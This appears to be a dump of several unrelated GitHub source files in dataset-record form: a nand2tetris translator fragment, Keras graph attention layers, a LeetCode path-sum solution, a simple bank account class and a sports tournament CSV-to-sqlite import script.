'(END)\\n@END\\n0;JMP\\n'\r\nif DEBUG:\r\n\tprint(output)\r\nelse:\r\n\tof = open(argv[1].replace('.vm','.asm'), 'w+')\r\n\tof.write(output)\r\n\tof.close()","repo_name":"xiaowan-tiger/nands2tetris","sub_path":"projects/08/VMTranslator_debug.py","file_name":"VMTranslator_debug.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35551995712","text":"# these codes are from \nimport numpy as np\nimport scipy.sparse as sp\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras import activations, initializers, regularizers, constraints\nfrom keras.layers import Layer, LeakyReLU, Dropout, AveragePooling2D, AveragePooling1D\n\ndef filter_dot(fltr, features):\n if len(K.int_shape(features)) == 2:\n # Single mode\n return K.dot(fltr, features)\n else:\n return K.batch_dot(fltr, features)\n\n\nclass GraphConv(Layer):\n def __init__(self,\n channels,\n activation=None,\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n **kwargs):\n if 'input_shape' not in kwargs and 'input_dim' in kwargs:\n kwargs['input_shape'] = (kwargs.pop('input_dim'),)\n super().__init__(**kwargs)\n self.channels = channels\n self.activation = activations.get(activation)\n self.use_bias = use_bias\n self.kernel_initializer = initializers.get(kernel_initializer)\n self.bias_initializer = initializers.get(bias_initializer)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n self.bias_regularizer = regularizers.get(bias_regularizer)\n self.activity_regularizer = regularizers.get(activity_regularizer)\n self.kernel_constraint = constraints.get(kernel_constraint)\n self.bias_constraint = constraints.get(bias_constraint)\n self.supports_masking = False\n\n def build(self, input_shape):\n assert len(input_shape) >= 2\n input_dim = input_shape[0][-1]\n self.kernel = self.add_weight(shape=(input_dim, self.channels),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n if self.use_bias:\n self.bias = self.add_weight(shape=(self.channels,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.bias = None\n self.built = True\n\n def call(self, inputs):\n features = inputs[0]\n fltr = inputs[1]\n\n # Convolution\n output = K.dot(features, self.kernel)\n output = filter_dot(fltr, output)\n\n if self.use_bias:\n output = K.bias_add(output, self.bias)\n if self.activation is not None:\n output = self.activation(output)\n return output\n\n def compute_output_shape(self, input_shape):\n features_shape = input_shape[0]\n output_shape = features_shape[:-1] + (self.channels,)\n return output_shape\n\n def get_config(self):\n config = {\n 'channels': self.channels,\n 'activation': activations.serialize(self.activation),\n 'use_bias': self.use_bias,\n 'kernel_initializer': initializers.serialize(self.kernel_initializer),\n 'bias_initializer': initializers.serialize(self.bias_initializer),\n 'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),\n 'bias_regularizer': regularizers.serialize(self.bias_regularizer),\n 'activity_regularizer': regularizers.serialize(self.activity_regularizer),\n 'kernel_constraint': constraints.serialize(self.kernel_constraint),\n 'bias_constraint': constraints.serialize(self.bias_constraint)\n }\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\nclass GraphAttention2(GraphConv):\n def __init__(self,\n channels,\n attn_heads=1,\n attn_heads_reduction='average', # {'concat', 'average'}\n dropout_rate=0.5,\n activation='relu',\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n attn_kernel_initializer='glorot_uniform',\n kernel_regularizer=None,\n bias_regularizer=None,\n attn_kernel_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n attn_kernel_constraint=None,\n **kwargs):\n super().__init__(channels, **kwargs)\n if attn_heads_reduction not in {'concat', 'average'}:\n raise ValueError('Possbile reduction methods: concat, average')\n\n self.channels = channels\n self.attn_heads = attn_heads\n self.attn_heads_reduction = attn_heads_reduction\n self.dropout_rate = dropout_rate\n self.activation = activations.get(activation)\n self.use_bias = use_bias\n self.kernel_initializer = initializers.get(kernel_initializer)\n self.bias_initializer = initializers.get(bias_initializer)\n self.attn_kernel_initializer = initializers.get(attn_kernel_initializer)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n self.bias_regularizer = regularizers.get(bias_regularizer)\n self.attn_kernel_regularizer = regularizers.get(attn_kernel_regularizer)\n self.activity_regularizer = regularizers.get(activity_regularizer)\n self.kernel_constraint = constraints.get(kernel_constraint)\n self.bias_constraint = constraints.get(bias_constraint)\n self.attn_kernel_constraint = constraints.get(attn_kernel_constraint)\n self.supports_masking = False\n\n # Populated by build()\n self.kernels = [] # Layer kernels for attention heads\n self.biases = [] # Layer biases for attention heads\n self.kernels2 = [] # Layer kernels for attention heads\n self.biases2 = [] # Layer biases for attention heads\n self.attn_kernels = [] # Attention kernels for attention heads\n\n if attn_heads_reduction == 'concat':\n # Output will have shape (..., attention_heads * channels)\n self.output_dim = self.channels * self.attn_heads\n else:\n # Output will have shape (..., channels)\n self.output_dim = self.channels\n\n def build(self, input_shape):\n assert len(input_shape) >= 2\n input_dim = input_shape[0][-1]\n\n # Initialize weights for each attention head\n for head in range(self.attn_heads):\n # Layer kernel\n kernel = self.add_weight(shape=(input_dim, self.channels),\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint,\n name='kernel_{}'.format(head))\n self.kernels.append(kernel)\n kernel2 = self.add_weight(shape=(input_dim, self.channels),\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint,\n name='kernel_{}'.format(head))\n self.kernels2.append(kernel2)\n # Layer bias\n if self.use_bias:\n bias = self.add_weight(shape=(self.channels,),\n initializer=self.bias_initializer,\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint,\n name='bias_{}'.format(head))\n self.biases.append(bias)\n # Attention kernels\n attn_kernel_self = self.add_weight(shape=(self.channels, 1),\n initializer=self.attn_kernel_initializer,\n regularizer=self.attn_kernel_regularizer,\n constraint=self.attn_kernel_constraint,\n name='attn_kernel_self_{}'.format(head))\n attn_kernel_neighs = self.add_weight(shape=(self.channels, 1),\n initializer=self.attn_kernel_initializer,\n regularizer=self.attn_kernel_regularizer,\n constraint=self.attn_kernel_constraint,\n name='attn_kernel_neigh_{}'.format(head))\n self.attn_kernels.append([attn_kernel_self, attn_kernel_neighs])\n self.built = True\n\n def call(self, inputs):\n X = inputs[0] # Node features (N x F)\n A = inputs[1] # Adjacency matrix (N x N)\n\n outputs = []\n for head in range(self.attn_heads):\n kernel = self.kernels[head] # W in the paper (F x F')\n kernel2 = self.kernels2[head]\n attention_kernel = self.attn_kernels[head] # Attention kernel a in the paper (2F' x 1)\n\n # Compute inputs to attention network\n features = K.dot(X, kernel) # (N x F')\n features2 = K.dot(X, kernel2)\n # Compute feature combinations\n # Note: [[a_1], [a_2]]^T [[Wh_i], [Wh_2]] = [a_1]^T [Wh_i] + [a_2]^T [Wh_j]\n attn_for_self = K.dot(features, attention_kernel[0]) # (N x 1), [a_1]^T [Wh_i]\n attn_for_neighs = K.dot(features, attention_kernel[1]) # (N x 1), [a_2]^T [Wh_j]\n\n # Attention head a(Wh_i, Wh_j) = a^T [[Wh_i], [Wh_j]]\n if len(K.int_shape(features)) == 2:\n attn_for_neighs_T = K.transpose(attn_for_neighs)\n else:\n attn_for_neighs_T = K.permute_dimensions(attn_for_neighs, (0, 2, 1))\n dense = attn_for_self + attn_for_neighs_T\n\n # Add nonlinearity\n dense = LeakyReLU(alpha=0.2)(dense)\n\n # Mask values before activation (Vaswani et al., 2017)\n mask = -10e9 * (1.0 - A)\n dense += mask\n\n # Apply softmax to get attention coefficients\n dense = K.softmax(dense) # (N x N)\n\n # Apply dropout to features and attention coefficients\n dropout_attn = Dropout(self.dropout_rate)(dense) # (N x N)\n dropout_feat = Dropout(self.dropout_rate)(features) # (N x F')\n\n # Convolution\n node_features = filter_dot(dropout_attn, dropout_feat)\n node_features += features2 \n if self.use_bias:\n node_features = K.bias_add(node_features, self.biases[head])\n\n # Add output of attention head to final output\n outputs.append(node_features)\n\n # Aggregate the heads' output according to the reduction method\n if self.attn_heads_reduction == 'concat':\n output = K.concatenate(outputs) # (N x KF')\n else:\n output = K.mean(K.stack(outputs), axis=0) # N x F')\n\n output = self.activation(output)\n return output\n\n def compute_output_shape(self, input_shape):\n output_shape = input_shape[0][:-1] + (self.output_dim,)\n return output_shape\n\n def get_config(self):\n config = {\n 'channels': self.channels,\n 'attn_heads': self.attn_heads,\n 'attn_heads_reduction': self.attn_heads_reduction,\n 'dropout_rate': self.dropout_rate,\n 'activation': activations.serialize(self.activation),\n 'use_bias': self.use_bias,\n 'kernel_initializer': initializers.serialize(self.kernel_initializer),\n 'bias_initializer': initializers.serialize(self.bias_initializer),\n 'attn_kernel_initializer': initializers.serialize(self.attn_kernel_initializer),\n 'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),\n 'bias_regularizer': regularizers.serialize(self.bias_regularizer),\n 'attn_kernel_regularizer': regularizers.serialize(self.attn_kernel_regularizer),\n 'activity_regularizer': regularizers.serialize(self.activity_regularizer),\n 'kernel_constraint': constraints.serialize(self.kernel_constraint),\n 'bias_constraint': constraints.serialize(self.bias_constraint),\n 'attn_kernel_constraint': constraints.serialize(self.attn_kernel_constraint),\n }\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\nclass GlobalPooling(Layer):\n def __init__(self, **kwargs):\n if 'input_shape' not in kwargs and 'input_dim' in kwargs:\n kwargs['input_shape'] = (kwargs.pop('input_dim'),)\n super().__init__(**kwargs)\n self.supports_masking = True\n self.pooling_op = None\n\n def build(self, input_shape):\n if isinstance(input_shape, list) and len(input_shape) == 2:\n self.data_mode = 'graph'\n else:\n if len(input_shape) == 2:\n self.data_mode = 'single'\n else:\n self.data_mode = 'batch'\n super().build(input_shape)\n\n def call(self, inputs):\n if self.data_mode == 'graph':\n X = inputs[0]\n I = inputs[1]\n if K.ndim(I) == 2:\n I = I[:, 0]\n else:\n X = inputs\n\n if self.data_mode == 'graph':\n return self.pooling_op(X, I)\n else:\n return K.sum(X, axis=-2, keepdims=(self.data_mode == 'single'))\n\n def compute_output_shape(self, input_shape):\n if self.data_mode == 'single':\n return (1,) + input_shape[-1:]\n elif self.data_mode == 'batch':\n return input_shape[:-2] + input_shape[-1:]\n else:\n return input_shape[0] # Input shape is a list of shapes for X and I\n\n def get_config(self):\n return super().get_config()\n \nclass GlobalAttnSumPool(GlobalPooling):\n\n def __init__(self,\n attn_kernel_initializer='glorot_uniform',\n kernel_regularizer=None,\n attn_kernel_regularizer=None,\n attn_kernel_constraint=None,\n **kwargs):\n super().__init__(**kwargs)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n self.attn_kernel_initializer = initializers.get(attn_kernel_initializer)\n self.attn_kernel_regularizer = regularizers.get(attn_kernel_regularizer)\n self.attn_kernel_constraint = constraints.get(attn_kernel_constraint)\n\n def build(self, input_shape):\n assert len(input_shape) >= 2\n if isinstance(input_shape, list) and len(input_shape) == 2:\n self.data_mode = 'graph'\n F = input_shape[0][-1]\n else:\n if len(input_shape) == 2:\n self.data_mode = 'single'\n else:\n self.data_mode = 'batch'\n F = input_shape[-1]\n # Attention kernels\n self.attn_kernel = self.add_weight(shape=(F, 1),\n initializer=self.attn_kernel_initializer,\n regularizer=self.attn_kernel_regularizer,\n constraint=self.attn_kernel_constraint,\n name='attn_kernel')\n\n self.built = True\n\n def call(self, inputs):\n if self.data_mode == 'graph':\n X, I = inputs\n if K.ndim(I) == 2:\n I = I[:, 0]\n else:\n X = inputs\n attn_coeff = K.dot(X, self.attn_kernel)\n attn_coeff = K.squeeze(attn_coeff, -1)\n attn_coeff = K.softmax(attn_coeff)\n if self.data_mode == 'single':\n output = K.dot(attn_coeff[None, ...], X)\n elif self.data_mode == 'batch':\n output = K.batch_dot(attn_coeff, X)\n else:\n output = attn_coeff[:, None] * X\n output = tf.segment_sum(output, I)\n\n return output\n\n def get_config(self):\n config = {\n 'attn_kernel_initializer': self.attn_kernel_initializer,\n 'kernel_regularizer': self.kernel_regularizer,\n 'attn_kernel_regularizer': self.attn_kernel_regularizer,\n 'attn_kernel_constraint': self.attn_kernel_constraint,\n }\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))","repo_name":"vinmuk/NFL-predict-yards","sub_path":"gcn_layer.py","file_name":"gcn_layer.py","file_ext":"py","file_size_in_byte":16977,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"17172013710","text":"# 113. Path Sum II\n# https://leetcode.com/problems/path-sum-ii/\n\n# 28 ms, faster than 94.70%\n# 16.1 MB, less than 63.24%\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def pathSumRec(self, root, targetSum, path, result):\n if not root:\n return\n path.append(root.val)\n if not root.left and not root.right and targetSum == root.val:\n result.append(path[::])\n else:\n self.pathSumRec(root.left, targetSum - root.val, path, result) or self.pathSumRec(root.right, targetSum - root.val, path, result)\n path.pop()\n \n def pathSum(self, root, targetSum):\n \"\"\"\n :type root: TreeNode\n :type targetSum: int\n :rtype: List[List[int]]\n \"\"\"\n result = []\n self.pathSumRec(root, targetSum, [], result)\n return result\n","repo_name":"DanielDionne/random_problems","sub_path":"leetcode/medium/113.py","file_name":"113.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6115045867","text":"# imports necessary classes from each file\r\nfrom Account_Final import Account\r\n\"\"\"\r\nBank class\r\n\r\nCreates an empty list to represent the bank and stores methods for adding to the bank, removing from the bank,\r\nfinding accounts in the bank, and adding monthly interest to all accounts.\r\n\"\"\"\r\nclass Bank():\r\n # Defines the maximum accounts in the bank as 100\r\n max_accounts = 100\r\n \"\"\"\r\n Constructor method\r\n\r\n Creates a variable attribute to represent the bank.\r\n \"\"\"\r\n def __init__(self):\r\n # An empty list to represent the bank\r\n self.accounts = []\r\n \"\"\"\r\n addAccountToBank method\r\n\r\n If the bank has less than 100 accounts the new account will be addded.\r\n \"\"\"\r\n def addAccountToBank(self, account):\r\n if len(self.accounts) < self.max_accounts:\r\n # Adds the account to the next open index in the bank\r\n self.accounts.append(account)\r\n return True\r\n else:\r\n # If full this print statement is returned\r\n print(\"No more accounts available\")\r\n return False\r\n \"\"\"\r\n removeAccountToBank method\r\n\r\n Iterates through the bank to find the account and removes it.\r\n \"\"\"\r\n def removeAccountFromBank(self, account):\r\n if account in self.accounts:\r\n # Finds selected account in bank and removes it.\r\n self.accounts.remove(account)\r\n return True\r\n else:\r\n return False\r\n \"\"\"\r\n findAccount method\r\n\r\n Iterates through the bank then to find the account and returns it.\r\n \"\"\"\r\n def findAccount(self, account_number):\r\n for account in self.accounts:\r\n # Finds account in bank with matching account number.\r\n if account.get_account_number() == account_number:\r\n return account\r\n return None\r\n \"\"\"\r\n addMonthlyInterest method\r\n\r\n Iterates through the bank and adds the inputted interest to all accounts.\r\n \"\"\"\r\n def addMonthlyInterest(self, percent):\r\n # Set yearly interest rate then divide by 12 to get monthly interest\r\n monthlyInterestRate = percent / 12 \r\n for account in self.accounts:\r\n if account is not None:\r\n balance = account.get_balance()\r\n interest = balance * monthlyInterestRate\r\n # Deposits the interest based on the calculation with the accounts balance.\r\n account.deposit(interest)\r\n print(f\"The monthly interest rate is now {monthlyInterestRate:.2f} %\")\r\n\r\n","repo_name":"Ryan-Richardson11/Banking-Application","sub_path":"FinalProject/Bank_Final.py","file_name":"Bank_Final.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33200158299","text":"#!env python3\n\"\"\" Import script\n\"\"\"\n\nfrom base64 import b64encode\nfrom datetime import datetime\nfrom os import urandom\nimport configparser\nimport csv\nimport json\nimport os\nimport re\nimport sqlite3\nimport string\nimport sys\n\nclass Import(object):\n\n def __init__(self, db_file):\n if not db_file:\n raise Exception(\"No DB File\")\n\n self.db = sqlite3.connect(db_file)\n self.db.row_factory = sqlite3.Row\n\n # self.tid = self.__findTD()\n self.src_folder = None\n self.tid = None\n\n def setSource(self, src_folder):\n self.src_folder = src_folder\n\n def importAll(self, src_folder=None, clear=False):\n if not src_folder:\n src_folder = self.src_folder\n\n tid = self.__findTID(src_folder)\n self.tid = tid\n if not tid:\n raise Exception(\"Unable to locate TID\")\n\n if clear:\n self.__clearScores(tid)\n\n self.src_folder = src_folder\n\n teams = self.__importTeams(tid)\n teams_pods = self.__importPods(tid, teams=teams)\n if teams_pods:\n self.__importSchedule(tid, teams=teams_pods)\n else:\n self.__importSchedule(tid, teams=teams)\n self.__importGroups(tid)\n self.__importRankings(tid)\n self.__importParams(tid)\n self.__importRosters(tid, teams=teams)\n\n def __findTID(self, src_folder):\n tid = None\n tid_file = os.path.join(src_folder, \"tid\")\n tournament_cfg = os.path.join(src_folder, \"tournament.cfg\")\n if os.path.isfile(tid_file):\n with open(tid_file, 'r') as f:\n line = f.readline()\n try:\n tid = int(line)\n except ValueError:\n print(\"TID file has something other than an integer\")\n # sys.exit(1)\n return None\n elif os.path.isfile(tournament_cfg):\n t_config = configparser.RawConfigParser()\n t_config.read(tournament_cfg)\n\n name = t_config.get(\"tournament\", \"name\")\n short_name = t_config.get(\"tournament\", \"short_name\")\n start_date = t_config.get(\"tournament\", \"start_date\")\n end_date = t_config.get(\"tournament\", \"end_date\")\n location = t_config.get(\"tournament\", \"location\")\n\n if not name or not short_name or not start_date or not end_date or not location:\n raise Exception(\"Tournaments cfg missing reuqired field\")\n\n cur = self.db.execute(\"SELECT tid FROM tournaments WHERE short_name=?\", (short_name,))\n row = cur.fetchone()\n\n if row:\n return row['tid']\n else:\n cur = self.db.execute(\"INSERT INTO tournaments(name, short_name, start_date, end_date, location, active) VALUES(?,?,?,?,?,?)\",\n (name, short_name, start_date, end_date, location, 1))\n\n self.db.commit()\n cur = self.db.execute(\"SELECT tid FROM tournaments WHERE short_name=?\", (short_name,))\n row = cur.fetchone()\n\n if row:\n return row['tid']\n else:\n raise Exception(\"Unknown error inserting tournament into DB\")\n else:\n print(\"You need a tid file!\")\n # sys.exit(1)\n return None\n\n cur = self.db.execute('SELECT name FROM tournaments WHERE tid=?', (tid,))\n res = cur.fetchone()\n\n if res:\n print(\"\\n-- %s --\\n\" % res['name'])\n return tid\n else:\n print(\"Unkown TID\")\n # sys.exit(1)\n return None\n\n def __clearScores(self, tid):\n print(\"Clearing out scores ...\")\n self.db.execute('DELETE FROM scores WHERE tid=?', (tid,))\n self.db.commit()\n\n print(\"Clearing out parameters ...\")\n self.db.execute('DELETE FROM params WHERE tid=?', (tid,))\n self.db.commit()\n\n def __importSchedule(self, tid, sched_file=None, teams=None):\n sched_file = os.path.join(self.src_folder, \"schedule.csv\")\n if not os.path.isfile(sched_file):\n return None\n\n print(\"Found a schedule ...\")\n cur = self.db.execute('DELETE FROM games WHERE tid=?', (tid,))\n self.db.commit()\n\n with open(sched_file, 'r') as f:\n schedule = csv.DictReader(f)\n for row in schedule:\n # print \"%s %s vs %s\" % (row['gid'], row['black'],\n # row['white'])\n\n if not row['gid']:\n continue\n\n # get the game ID number out of colums like #53\n gid_match = re.match(r\".*?(\\d+)\", row['gid'])\n #import pdb; pdb.set_trace()\n if gid_match:\n gid = gid_match.group(1)\n gid = int(gid)\n else:\n continue\n\n #print \"Working on game %s\" % gid\n if re.match('^\\d\\:\\d\\d', row['time']) is not None:\n row['time'] = \"0%s\" % row['time']\n\n if row['white'].lower() == \"no game\" or row['black'].lower() == \"no game\":\n continue\n\n white = self.__processGame(row['white'], teams, row['div'])\n if not white:\n raise Exception(f\"Cannot parse white: {row['white']} for {row['gid']}\")\n\n black = self.__processGame(row['black'], teams, row['div'])\n if not black:\n raise Exception(f\"Cannot parse black: {row['black']} for {row['gid']}\")\n\n pod = None\n # this is broke from the conversion to JSON, if I need this again I need to fix it\n # white var is like '{\"type\": \"team\", \"team_id\": \"2\"}' !! string\n # if re.match(r\"T[\\d+]\", white) and re.match(r\"T[\\d+]\", black):\n # white_id = white.split(\"T\")[1]\n # div = teams[white_id]['div']\n # if 'pod' in teams[white_id]:\n # pod = teams[white_id]['pod']\n # else:\n # pod = None\n # else:\n # div = row['div']\n # pod = row['pod']\n\n date = None\n try:\n date = datetime.strptime(row['date'], '%m/%d/%Y')\n except ValueError:\n pass\n\n if not date:\n try:\n date = datetime.strptime(row['date'], '%m/%d/%y')\n except ValueError:\n print(f\"[Error]\\tGame {gid} couldn't convert date with either attempt\")\n sys.exit(1)\n\n if re.match(r\"^\\d\\d:\\d\\d$\", row['time']):\n time = datetime.strptime(row['time'], '%H:%M')\n elif re.match(r\"^\\d\\d:\\d\\d:\\d\\d$\", row['time']):\n time = datetime.strptime(row['time'], '%H:%M:%S')\n else:\n print(f\"[Error]\\tUnable to parse time for game {gid}\")\n continue\n\n start_time = datetime.combine(\n datetime.date(date), datetime.time(time))\n\n div = row['div']\n if not div:\n if row['type'] == \"RR\":\n white_team = json.loads(white)\n white_id = white_team['team_id']\n div = teams[white_id]['div']\n\n # if not div:\n # raise Exception(f\"missing division for game: {gid}\")\n\n if not row['type']:\n print(f\"[Warn]\\tGame {gid} has no type\", file=sys.stderr)\n\n cur = self.db.execute(\"INSERT INTO games(tid, gid, day, start_time, pool, black, white, division, pod, type, description) VALUES(?,?,?,?,?,?,?,?,?,?,?)\",\n (tid, gid, row['day'], start_time, row['pool'], black, white, div, pod, row['type'], row['desc']))\n self.db.commit()\n\n def __processGame(self, game_string, teams=None, division=None):\n orig_string = game_string\n\n # print(game_string)\n m = re.match(\"^(\\d+)\\s*[sS]eed\\s*(\\w+)\", game_string)\n if m:\n seed = m.group(1)\n group = m.group(2)\n group = group[:1]\n parsed = json.dumps({\"type\": \"seed\", \"group\": group, \"seed\": seed})\n return parsed\n # return \"S%s%s\" % (pod, seed)\n\n m = re.match(\"^(\\w+)\\s*[sS]eed\\s*(\\d+)\", game_string)\n if m:\n pod = m.group(1)\n #pod = pod[:1] # nations 2019, you should remove this\n seed = m.group(2)\n parsed = json.dumps({\"type\": \"seed\", \"group\": pod, \"seed\": seed})\n return parsed\n # return \"S%s%s\" % (pod, seed)\n\n m = re.match(\"^Open(\\d+)$\", game_string)\n if m:\n seed = m.group(1)\n parsed = json.dumps({\"type\": \"seed\", \"group\": \"O\", \"seed\": seed})\n return parsed\n\n m = re.match(\"^[l|L].*?(\\d+)\", game_string)\n if m:\n # game_string = \"L%s\" % m.group(1)\n return json.dumps({\"type\": \"loser\", \"game\": m.group(1)})\n # return game_string\n\n m = re.match(\"^[w|W].*?(\\d+)\", game_string)\n if m:\n game_string = \"W%s\" % m.group(1)\n return json.dumps({\"type\": \"winner\", \"game\": m.group(1)})\n # return game_string\n\n\n # worlds logic, just keeping around cause\n # pieces = game_string.split()\n # if len(pieces) == 2:\n # group = pieces[0]\n # name = pieces[1]\n # #import pdb; pdb.set_trace()\n # for team in teams:\n # #import pdb; pdb.set_trace()\n # if group == \"MM\" or group == \"MW\":\n # if teams[team]['short_name'] == name and teams[team]['div'] == group:\n # game_string = \"T%s\" % team\n # elif group == \"MA\" or group == \"MB\":\n # if teams[team]['short_name'] == name and teams[team]['div'] == \"M\":\n # game_string = \"T%s\" % team\n # elif group == \"WA\" or group == \"WB\":\n # if teams[team]['short_name'] == name and teams[team]['div'] == \"W\":\n # game_string = \"T%s\" % team\n # else:\n # print \"Unknown group? %s \" % group\n # if not re.match(r\"T[\\d+]\", game_string):\n # import pdb; pdb.set_trace()\n # return game_string\n # else:\n # print \"Not sure what happened: %s\" % pieces\n\n # game_string = division + \" \" + game_string\n team_id = self.__findTeam(game_string, teams)\n if team_id:\n return json.dumps({\"type\": \"team\", \"team_id\": team_id})\n\n # Seed notation \"group #\"\n m = re.match(r\"^(\\w+)\\s(\\d+)$\", game_string)\n if m:\n group = m.group(1)\n seed = m.group(2)\n\n return json.dumps({\"type\": \"seed\", \"group\": group, \"seed\": seed})\n # return \"S%s%s\" % (group, rank)\n\n m = re.match(r\"^(\\w+)(\\d)$\", game_string)\n if m:\n seed = m.group(1)\n group = m.group(2)\n return json.dumps({\"type\": \"seed\", \"group\": group, \"seed\": seed})\n\n #import pdb; pdb.set_trace()\n raise Exception(f\"Unable to process game string {game_string}\")\n\n def __isUnique(self, game_string):\n \"\"\" Tests if a team assignement already exists in the schedule, mostly for like W## or L## \"\"\"\n cur = self.db.execute(\"SELECT gid FROM games WHERE tid=? AND (white = ? or black = ?)\", (self.tid, game_string, game_string))\n game_id = cur.fetchone()\n if game_id:\n return False\n else:\n return True\n\n def __findTeam(self, team_name, teams_dict, division=None):\n team_id = None\n for id, team in teams_dict.items():\n if team['short_name'] == team_name or team['name'] == team_name:\n team_id = id\n break\n\n return team_id\n\n def __importTeams(self, tid, teams_file=None):\n team_file = os.path.join(self.src_folder, \"teams.csv\")\n if not os.path.isfile(team_file):\n return None\n print(\"Found list of teams ...\")\n cur = self.db.execute('DELETE FROM teams WHERE tid=?', (tid,))\n self.db.commit()\n\n cur = self.db.execute(\"SELECT short_name FROM tournaments WHERE tid=?\", (tid,))\n tournament = cur.fetchone()\n\n if tournament:\n short_name = tournament['short_name']\n else:\n short_name = tid\n\n teams_dict = {}\n with open(team_file, 'r') as f:\n teams = csv.DictReader(f)\n for row in teams:\n team_id = row['team_id']\n if not team_id:\n continue\n flag_file = None\n\n # worlds hack, delete me!!\n # team_name = \"%s %s\" % (row['div'], row['name'])\n # team_name = row['name']\n # teams_dict[team_id] = {'name': row['name'], 'short_name': row['short_name'], 'div': row['div']}\n #\n # # country = string.join(team_name.split(\" \")[1:], \" \")\n # country = country.lower().replace(\" \", \"_\")\n flag_file = \"/static/flags/%s/%s.png\" % (short_name, team_id)\n\n teams_dict[team_id] = {'name': row['name'], 'short_name': row['short_name'], 'div': row['div']}\n cur = self.db.execute(\"INSERT INTO teams(tid, team_id, name, short_name, division, flag_file) VALUES(?,?,?,?,?,?)\",\n (tid, row['team_id'], row['name'], row['short_name'], row['div'], flag_file))\n\n return teams_dict\n\n def __importRankings(self, tid, rankings_file=None):\n rankings_file = os.path.join(self.src_folder, \"rankings.csv\")\n if not os.path.isfile(rankings_file):\n return None\n\n print(\"Found rankings file ....\")\n cur = self.db.execute(\"DELETE FROM rankings WHERE tid=?\", (tid,))\n self.db.commit()\n\n with open(rankings_file, 'r') as f:\n rankings = csv.DictReader(f)\n for row in rankings:\n game = self.__processGame(row['game'])\n cur = self.db.execute(\"INSERT INTO rankings(tid, place, game, division) VALUES(?,?,?,?)\",\n (tid, row['place'], game, row['div']))\n self.db.commit()\n\n def __importGroups(self, tid, groups_file=None):\n groups_file = os.path.join(self.src_folder, \"groups.csv\")\n if not os.path.isfile(groups_file):\n return None\n\n print(\"Found groups file ....\")\n cur = self.db.execute(\"DELETE FROM groups WHERE tid=?\", (tid,))\n self.db.commit()\n\n with open(groups_file, 'r') as f:\n groups = csv.DictReader(f)\n for row in groups:\n if 'group_color' in row:\n group_color = row['group_color']\n else:\n group_color = None\n\n if 'pod_round' in row:\n pod_round = row['pod_round']\n else:\n pod_round = None\n\n cur = self.db.execute(\"INSERT INTO groups(tid,group_id,name,group_color, pod_round) VALUES(?,?,?,?,?)\",\n (tid, row['group_id'], row['name'], group_color, pod_round))\n self.db.commit()\n\n def __importPods(self, tid, pods_file=None, teams=None):\n pods_file = os.path.join(self.src_folder, \"pods.csv\")\n if not os.path.isfile(pods_file):\n return None\n\n print(\"Found pods file ...\")\n cur = self.db.execute(\"DELETE FROM pods WHERE tid=?\", (tid,))\n self.db.commit()\n\n with open(pods_file, 'r') as f:\n pods = csv.DictReader(f)\n for row in pods:\n cur = self.db.execute(\"INSERT INTO pods(tid, team_id, pod) VALUES(?,?,?)\",\n (tid, row['team_id'], row['pod']))\n if teams:\n team_id = row['team_id']\n pod = row['pod']\n teams[team_id]['pod'] = pod\n\n self.db.commit()\n\n return teams\n\n def __importParams(self, tid, params_file=None):\n params_file = os.path.join(self.src_folder, \"params.cfg\")\n\n if not os.path.isfile(params_file):\n return None\n\n print(\"Found params.cfg ...\")\n params = configparser.RawConfigParser()\n params.read(params_file)\n\n for p in params.items('params'):\n cur = self.db.execute(\"INSERT INTO params(tid, field, val) VALUES(?,?,?)\",\n (tid, p[0], p[1]))\n self.db.commit()\n\n def __importRosters(self, tid, roster_file=None, teams=None):\n if not roster_file:\n roster_file = os.path.join(self.src_folder, \"rosters.csv\")\n if not os.path.isfile(roster_file):\n return None\n\n print(\"Found rosters file ...\")\n cur = self.db.execute(\"DELETE FROM rosters WHERE tid=?\", (tid,))\n self.db.commit()\n\n with open(roster_file, 'r') as f:\n rosters = csv.DictReader(f)\n team_name = None\n team_id = None\n for row in rosters:\n if row['team']:\n team_name = row['team']\n team_id = self.__findTeam(team_name, teams)\n if not team_id:\n raise(Exception(\"Couldn't parse team name %s\" % team_name))\n\n if not 'player_name' in row or not row['player_name']:\n continue\n # if not 'first' in row or not row['first']:\n # continue\n\n if not team_id:\n print(\"I forgot me team\")\n raise(Exception(\"I sucks\"))\n\n player_name = row['player_name'].strip()\n # player_name = \"%s %s\" % (row['first'].strip().title(), row['last'].strip().title())\n # player_name = player_name.strip()\n\n # strpint non-unicode characters, can't actually do this when I get real names with accents and what not, will need to fix\n # player_name = ''.join([x for x in player_name if ord(x) < 128])\n # name_parts = player_name.split(\" \")\n # last_name = name_parts[-1]\n # 